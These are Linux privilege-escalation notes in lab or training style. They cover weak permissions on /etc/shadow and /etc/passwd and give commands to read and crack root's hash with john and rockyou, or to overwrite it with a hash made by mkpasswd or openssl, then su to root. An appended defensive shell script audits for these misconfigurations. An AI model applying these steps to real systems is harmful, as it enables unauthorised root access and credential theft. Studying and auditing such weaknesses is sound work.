Passwd & shadow
Weak File Permissions - Readable /etc/shadow
View the contents of the /etc/shadow file:
cat /etc/shadow
Each user's password hash (if they have one) is the field between the first and second colons (:) of that user's line.
john --wordlist=/usr/share/wordlists/rockyou.txt hash.txt
Log in as root:
su root
Weak File Permissions - Writable /etc/shadow
Generate a new password hash with a password of your choice:
mkpasswd -m sha-512 <new-password-here>
Edit the /etc/shadow file and replace the original root user's password hash with the one you just generated.
Log in as root:
su root
Weak File Permissions - Writable /etc/passwd
The /etc/passwd file contains information about user accounts. It is world-readable, but usually only writable by the root user. Historically, the /etc/passwd file contained user password hashes, and some versions of Linux will still allow password hashes to be stored there.
Generate a new password hash with a password of your choice:
openssl passwd <new-password-here>
Edit the /etc/passwd file and place the generated password hash between the first and second colons (:) of the root user's row (replacing the "x").
Log in as root:
su root
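Defender-side check for the three misconfigurations covered in these notes, added here as an example (it is not part of the original notes). The function name, finding labels and parameters are assumptions made for this example; it reports a world-readable or world-writable /etc/shadow, a world-writable /etc/passwd, and any /etc/passwd row whose password field holds something other than "x" or a locked marker.

```sh
#!/bin/sh
# Added example (not from the original notes): audit for the three
# misconfigurations above. Paths are parameters so the checks can be
# run against test copies; they default to the real files.
# Usage: audit_passwd_shadow [passwd-file] [shadow-file]

# Print the "other" permission bits (e.g. "r--") of a file.
# Characters 8-10 of the ls mode string are the bits for everyone else.
other_perms() {
    ls -ld "$1" | cut -c8-10
}

# Print one finding per line; print nothing when everything is clean.
# Only the world ("other") bits are examined, not owner or group.
audit_passwd_shadow() {
    passwd_file=${1:-/etc/passwd}
    shadow_file=${2:-/etc/shadow}

    shadow_bits=$(other_perms "$shadow_file")
    passwd_bits=$(other_perms "$passwd_file")

    case $shadow_bits in r??) echo "SHADOW_WORLD_READABLE $shadow_file" ;; esac
    case $shadow_bits in ?w?) echo "SHADOW_WORLD_WRITABLE $shadow_file" ;; esac
    case $passwd_bits in ?w?) echo "PASSWD_WORLD_WRITABLE $passwd_file" ;; esac

    # Field 2 of passwd should be "x" (hash kept in shadow) or a locked
    # marker ("*" or "!..."). Anything else is an empty password or a
    # hash stored directly in passwd.
    awk -F: '
        NF < 2   { next }
        $2 == "" { print "PASSWD_EMPTY_PASSWORD " $1; next }
        $2 !~ /^(x|\*|!.*)$/ { print "PASSWD_HOLDS_HASH " $1 }
    ' "$passwd_file"
}
```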